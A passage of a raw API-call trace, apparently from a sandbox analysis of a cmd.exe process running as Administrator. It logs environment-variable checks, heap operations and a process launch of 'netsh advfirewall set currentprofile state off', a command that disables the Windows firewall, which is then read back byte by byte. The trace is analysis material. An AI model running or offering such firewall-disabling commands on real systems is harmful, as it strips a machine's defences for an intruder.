dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x98, hStdOutput=0xfc, hStdError=0xfc)) [0046.753] GetProcessHeap () returned 0x470000 [0046.753] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x20) returned 0x484640 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0046.753] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.754] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.754] GetProcessHeap () returned 0x470000 [0046.754] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x484640 | out: hHeap=0x470000) returned 1 [0046.754] GetProcessHeap () returned 0x470000 [0046.754] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x485ca0 [0046.754] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\netsh.exe", lpCommandLine="netsh advfirewall set currentprofile state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cf330*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh advfirewall set currentprofile state off", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf2e0 | out: lpCommandLine="netsh advfirewall set currentprofile state off", lpProcessInformation=0x2cf2e0*(hProcess=0x54, hThread=0x50, dwProcessId=0x9f0, dwThreadId=0x9f4)) returned 1 [0046.867] CloseHandle (hObject=0x50) returned 1 [0046.868] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.868] GetProcessHeap () returned 0x470000 [0046.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48c230 | out: hHeap=0x470000) returned 1 [0046.868] GetEnvironmentStringsW () returned 0x48aa10* [0046.868] GetProcessHeap () returned 0x470000 [0046.868] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xae8) returned 0x48b500 [0046.868] FreeEnvironmentStringsW (penv=0x48aa10) returned 1 [0046.868] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76f50000 [0046.868] GetProcAddress (hModule=0x76f50000, lpProcName="NtQueryInformationProcess") returned 0x76fa14a0 [0046.868] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x2cebe8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x2cebe8, ReturnLength=0x0) returned 0x0 [0046.868] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffde000, lpBuffer=0x2cec20, nSize=0x380, lpNumberOfBytesRead=0x2cebe0 | out: lpBuffer=0x2cec20*, lpNumberOfBytesRead=0x2cebe0*=0x380) returned 1 [0046.868] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0065.172] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2cf228 | out: lpExitCode=0x2cf228*=0x40010004) returned 1 [0065.172] CloseHandle (hObject=0x54) returned 1 [0065.172] _vsnwprintf (in: _Buffer=0x2cf498, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf238 | out: _Buffer="40010004") returned 8 [0065.172] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="40010004") returned 1 [0065.172] GetProcessHeap () returned 0x470000 [0065.172] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48b500 | out: hHeap=0x470000) returned 1 [0065.172] GetEnvironmentStringsW () returned 0x48aa10* [0065.172] GetProcessHeap () returned 0x470000 [0065.172] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb0e) returned 0x48eb10 [0065.172] FreeEnvironmentStringsW (penv=0x48aa10) returned 1 [0065.172] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0065.172] GetProcessHeap () returned 0x470000 [0065.172] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48eb10 | out: hHeap=0x470000) returned 1 [0065.173] GetEnvironmentStringsW () returned 0x48aa10* [0065.173] GetProcessHeap () returned 0x470000 [0065.173] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb0e) returned 0x48eb10 [0065.173] FreeEnvironmentStringsW (penv=0x48aa10) returned 1 [0065.173] GetProcessHeap () returned 0x470000 [0065.173] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x485ca0 | out: hHeap=0x470000) returned 1 [0065.173] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf2f8 | out: lpAttributeList=0x2cf2f8) [0065.174] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0065.174] _get_osfhandle (_FileHandle=1) returned 0xfc [0065.174] SetConsoleMode (hConsoleHandle=0xfc, dwMode=0x0) returned 0 [0065.174] _get_osfhandle (_FileHandle=1) returned 0xfc [0065.175] GetConsoleMode (in: hConsoleHandle=0xfc, lpMode=0x4a4be194 | out: lpMode=0x4a4be194) returned 0 [0065.175] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.175] GetConsoleMode (in: hConsoleHandle=0x98, lpMode=0x4a4be198 | out: lpMode=0x4a4be198) returned 0 [0065.175] GetConsoleOutputCP () returned 0x1b5 [0065.175] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4cbfe0 | out: lpCPInfo=0x4a4cbfe0) returned 1 [0065.175] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0065.175] GetProcessHeap () returned 0x470000 [0065.175] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489c40 | out: hHeap=0x470000) returned 1 [0065.175] GetProcessHeap () returned 0x470000 [0065.175] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489b00 | out: hHeap=0x470000) returned 1 [0065.175] GetProcessHeap () returned 0x470000 [0065.175] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x485b70 | out: hHeap=0x470000) returned 1 [0065.175] GetProcessHeap () returned 0x470000 [0065.175] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489a80 | out: hHeap=0x470000) returned 1 [0065.175] GetProcessHeap () returned 0x470000 [0065.175] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x471cd0 | out: hHeap=0x470000) returned 1 [0065.175] GetProcessHeap () returned 0x470000 [0065.175] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x471ab0 | out: hHeap=0x470000) returned 1 [0065.176] GetProcessHeap () returned 0x470000 [0065.176] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4898a0 | out: hHeap=0x470000) returned 1 [0065.176] GetProcessHeap () returned 0x470000 [0065.176] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x484610 | out: hHeap=0x470000) returned 1 [0065.176] GetProcessHeap () returned 0x470000 [0065.176] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4897e0 | out: hHeap=0x470000) returned 1 [0065.176] _vsnwprintf (in: _Buffer=0x4a4d6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf758 | out: _Buffer="\r\n") returned 2 [0065.176] _get_osfhandle (_FileHandle=1) returned 0xfc [0065.176] GetFileType (hFile=0xfc) returned 0x3 [0065.176] _get_osfhandle (_FileHandle=1) returned 0xfc [0065.176] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0065.176] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf728, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cf728*=0x2, lpOverlapped=0x0) returned 1 [0065.176] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0065.176] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4cc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.176] _vsnwprintf (in: _Buffer=0x4a4beb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf768 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0065.177] _vsnwprintf (in: _Buffer=0x4a4bebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf768 | out: _Buffer=">") returned 1 [0065.177] _get_osfhandle (_FileHandle=1) returned 0xfc [0065.177] GetFileType (hFile=0xfc) returned 0x3 [0065.177] _get_osfhandle (_FileHandle=1) returned 0xfc [0065.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0065.177] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2cf758, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cf758*=0x26, lpOverlapped=0x0) returned 1 [0065.177] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.177] GetFileType (hFile=0x98) returned 0x3 [0065.177] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.177] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.177] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.177] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce320, cchWideChar=1 | out: lpWideCharStr="netsh advfirewall set currentprofile state off\n") returned 1 [0065.177] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.177] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.177] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.177] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce322, cchWideChar=1 | out: lpWideCharStr="etsh advfirewall set currentprofile state off\n") returned 1 [0065.177] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.177] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.178] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.178] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce324, cchWideChar=1 | out: lpWideCharStr="tsh advfirewall set currentprofile state off\n") returned 1 [0065.178] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.178] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.178] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.178] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce326, cchWideChar=1 | out: lpWideCharStr="sh advfirewall set currentprofile state off\n") returned 1 [0065.178] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.178] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.178] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.178] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce328, cchWideChar=1 | out: lpWideCharStr="h advfirewall set currentprofile state off\n") returned 1 [0065.178] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.178] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.178] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.178] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce32a, cchWideChar=1 | out: lpWideCharStr=" advfirewall set currentprofile state off\n") returned 1 [0065.178] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.178] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.178] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.178] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce32c, cchWideChar=1 | out: lpWideCharStr="fdvfirewall set currentprofile state off\n") returned 1 [0065.178] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.178] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.178] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.178] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce32e, cchWideChar=1 | out: lpWideCharStr="ivfirewall set currentprofile state off\n") returned 1 [0065.178] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.178] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.178] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce330, cchWideChar=1 | out: lpWideCharStr="rfirewall set currentprofile state off\n") returned 1 [0065.179] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.179] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce332, cchWideChar=1 | out: lpWideCharStr="eirewall set currentprofile state off\n") returned 1 [0065.179] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.179] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce334, cchWideChar=1 | out: lpWideCharStr="wrewall set currentprofile state off\n") returned 1 [0065.179] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.179] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce336, cchWideChar=1 | out: lpWideCharStr="aewall set currentprofile state off\n") returned 1 [0065.179] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.179] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce338, cchWideChar=1 | out: lpWideCharStr="lwall set currentprofile state off\n") returned 1 [0065.179] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.179] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce33a, cchWideChar=1 | out: lpWideCharStr="lall set currentprofile state off\n") returned 1 [0065.179] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.179] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce33c, cchWideChar=1 | out: lpWideCharStr=" ll set currentprofile state off\n") returned 1 [0065.179] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.179] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.180] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce33e, cchWideChar=1 | out: lpWideCharStr="sl set currentprofile state off\n") returned 1 [0065.180] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.180] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.180] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.180] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce340, cchWideChar=1 | out: lpWideCharStr="e set currentprofile state off\n") returned 1 [0065.180] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.180] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.180] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.180] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce342, cchWideChar=1 | out: lpWideCharStr="tset currentprofile state off\n") returned 1 [0065.180] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.180] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.180] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.180] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce344, cchWideChar=1 | out: lpWideCharStr=" et currentprofile state off\n") returned 1 [0065.180] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.180] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.180] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.180] MultiByteToWideChar (in: CodePage=0x1b5, 